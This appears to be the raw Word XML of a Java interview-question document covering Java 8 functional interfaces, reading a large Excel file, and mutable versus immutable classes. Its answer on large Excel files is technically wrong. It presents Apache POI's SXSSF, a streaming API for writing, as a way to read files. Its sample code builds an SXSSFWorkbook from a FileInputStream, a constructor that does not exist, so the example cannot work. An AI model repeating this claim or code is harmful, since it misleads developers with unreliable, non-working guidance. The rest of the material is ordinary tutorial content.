          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package, which are extensively used for functional programming, especially with lambdas and streams. Some key predefined interfaces in Java 8 are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAFA6D"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edicate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5EBB4"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boolean-valued function of one argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31605CDD"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filtering or matching conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D76985"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AF7E7FC"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n -&gt; n % 2 == 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B9220"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4C71BED3"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lt;T, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B27F6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an argument of type T and produces a result of type R.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDF7E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transformation operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CABDA7D"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7E9E67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133C5DFF"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Hello")); // 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEEBA89"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umer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A76C468"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n operation that accepts a single input argument and returns no result (void).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59598AD1"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operations that only consume a value, like printing or modifying an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F673D"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4987D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UpperCase = s -&gt; System.out.println(s.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2922F29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UpperCase.accept("hello"); // HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1655F"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upplier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AB12C"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supplier of results, i.e., it produces a result of type T but doesn't take any input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BBFA6"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hen you need to generate values or create new objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110414E8"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4A2B456"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Value = () -&gt; Math.random();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED3FF3"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Value.get()); // prints a random number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB3F05"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naryOperator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D7252"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Function&lt;T, T&gt;, which represents a function that takes an argument of type T and returns a result of the same type T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC75C8D"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for operations that modify or process the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A365FDE"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308C5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Integer&gt; doubleValue = n -&gt; n * 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D0B3B"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doubleValue.apply(4)); // 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC4A7E2"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inaryOperator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C694D97"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BiFunction&lt;T, T, T&gt;, which represents a function that takes two arguments of the same type T and returns a result of the same type T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED24E15"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combining two values of the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A4642"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636288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add = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD484A"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2, 3)); // 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B0DC8"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BiFunction&lt;T, U, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C95C2"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two arguments, one of type T and the other of type U, and returns a result of type R.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A2718"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for operations that require two arguments and return a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A81B0"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2BDF8BB"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a * b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBF5D3"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multiply.apply(2, 3)); // 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49127BF7"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iPredicate&lt;T, U&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A842D"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predicate (boolean-valued function) that takes two arguments, one of type T and the other of type U.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1D9D32"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2A2461C1"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Predicate&lt;Integer, Integer&gt; isSumEven = (a, b) -&gt; (a + b) % 2 == 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6F3B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SumEven.test(1, 3)); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B819690"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mparator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A0AA6"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mparison function, which is used to compare two objects of type T for sorting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7515B"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ith collections like List.sort() or Collections.sort().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8DBBD"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512A6AC"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lt;Integer&gt; compareAsc = (a, b) -&gt; a - b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790D320"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mpareAsc.compare(3, 5)); // -2 (3 is less than 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0046C4"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Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A7CCBA"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not part of java.util.function, Optional is a predefined class that was introduced in Java 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6601C3"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ntainer for possibly null values, providing methods to handle null more gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EA255"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0866089"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Name = Optional.ofNullable("John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32307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Name.ifPresent(name -&gt; System.out.println(name)); // John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56798CF5" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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interfaces help facilitate the functional programming paradigm introduced in Java 8, enabling you to write cleaner, more expressive, and reusable code with lambdas and streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5E7FA" w14:textId="66822E1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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A9C18" w14:textId="043D8181" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="009A3EA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc197867293"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If I have a 200 MB excel file so can java read that file</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="5A81D9ED" w14:textId="74A5F0F9" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF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things to consider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70EA94"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braries for Reading Excel Files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4345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provides several libraries for reading Excel files. Some popular ones include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B7C756"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A672C1F"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 is a widely used library for reading and writing Excel files in Java. It can handle both .xls (HSSF) and .xlsx (XSSF) file formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73148118"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s XSSF (for .xlsx files) and HSSF (for .xls files) are typically used to read Excel files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A95BC5"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 Streaming API (SXSSF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20327DB1"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dealing with very large files (like a 200 MB Excel file), consider using </w:t>
      </w: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XSSF writes data to disk and keeps a small in-memory buffer for the current sheet, which can be helpful when reading large Excel files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A74619"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nCSV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C38F6E3"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ading CSV data in a memory-efficient way, OpenCSV is a good option, though it only works with CSV files. If your Excel file can be saved as CSV, this could be a good choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40643915"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iderations for Reading Large Excel Files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEEB391"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636BB2D1"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large files directly into memory can consume a lot of resources, leading to OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B7E068"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for writing large files) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Streaming API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for reading) are more memory-efficient because they process the file in chunks rather than loading it entirely into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A28BF8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3847D43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streaming approaches, such as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache POI Streaming API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which reads and processes the file in chunks, reducing the memory footprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A60539"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in Chunks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23261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processing the entire file at once, read and process it row-by-row or in small batches. This helps keep memory usage low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5179E82C"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example, reading rows from the Excel file as streams and performing necessary operations incrementally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCCBE5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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE1D90"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reading very large files and need to perform intensive processing, consider using multithreading to break the task into smaller chunks (e.g., by sheets or rows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B10BFB"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pache POI's Streaming API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2580E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how you might use Apache POI to read a large .xlsx Excel file with minimal memory usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE63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xssf.streaming.SXSSFWorkbook;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BC9FB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ss.usermodel.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A48A71F" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204010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FileInputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B685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93F453A" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4FA7C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ReadLargeExcelFile {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E336F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6CC0366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InputStream fis = new FileInputStream("large_file.xlsx");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F4391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SXSSFWorkbook wb = new SXSSFWorkbook(fis)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E938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eet sheet = wb.getSheetAt(0); // Read the first sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD6A2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CED73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Row row : sheet) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022A8B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Cell cell : row) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAFC24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cell.getCellType()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE295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STRING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0344C3F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StringCellValue() + "\t");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E16E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D6226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NUMERIC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5977EA8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NumericCellValue() + "\t");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686DE98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BA3E2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BOOLEAN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B18F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BooleanCellValue() + "\t");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569E7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0AF5C57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11A4C6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Unknown\t");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7955D67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1292C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6225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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AFCD5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5D1A2"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808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E7396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911706"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echniques for Efficient File Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D4AD3"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pache POI SXSSF for Large Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This approach allows you to handle large files with minimal memory usage by streaming the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C4E0D"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Files Row-by-Row</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Avoid loading the entire file into memory. Process the file in chunks (one row at a time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6B3AEA"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Memory Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Make sure you're not holding large objects in memory for longer than necessary, and be mindful of large intermediate objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BFF5F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FE680">
          <v:rect id="_x0000_i1225" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="069648EA" w14:textId="3DC4B4A3" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B87" w:rsidP="00A37CF1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc197867294"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is immutability and mutability in java</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="2691FA90" w14:textId="66CE4875" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00EE12AD">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 and Mutability in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494633A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83A2C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Immutable Objects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1E0FE"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are final</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once assigned, they cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151379C"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 or mutators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The object does not provide methods to modify its internal state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF0C2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ep copies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Immutable objects are inherently thread-safe because their state cannot change once they are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFF43B"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Immutable Objects?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D796EFA"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Because their state cannot be changed, they can be safely shared between multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A323E4"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easier to reason about</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since they cannot change, there is no risk of side effects or unexpected behavior in the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA4CF13"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suitable for caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once created, they remain the same, so they can be used as cache keys or in other scenarios where you want predictable behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8DF4D"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 in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B46D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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28A27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30ED36E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175EF716" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3139B3F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DB94A8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6C909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7F45E4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D2A191" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8CF93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E42708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25E3BD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D9F13A" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4007F7B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CB60EE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3F677AD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E003F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04D24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02D20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final to prevent subclassing, ensuring immutability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FCB7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are final, so their values cannot be changed after initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CFF7A"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no setter methods to modify the fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2591B919"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utability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276BC6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Mutable Objects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDAACC1"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can be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can change the values of fields after the object is constructed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592251C3"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s or mutators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Mutable objects usually provide setter methods that allow external code to modify their internal state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7926A"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inherently thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the state can change at any time, mutable objects may not be thread-safe unless you synchronize access to them or otherwise manage concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA8A78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Mutable Objects?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1030AB29"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more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can modify the object as needed, which is useful for many scenarios (like updating user data, changing attributes of a product, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622FCC4"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y can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>save memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Mutable objects can be reused or modified instead of creating new instances each time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747BFDE"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Mutable Class in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698B19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mployee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1D72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506EEB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5FFF71C" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B7BBD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EAE430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4E638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04CC87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B2A32A" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2A75B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F3108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6ECDC81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782B56F"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74675" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
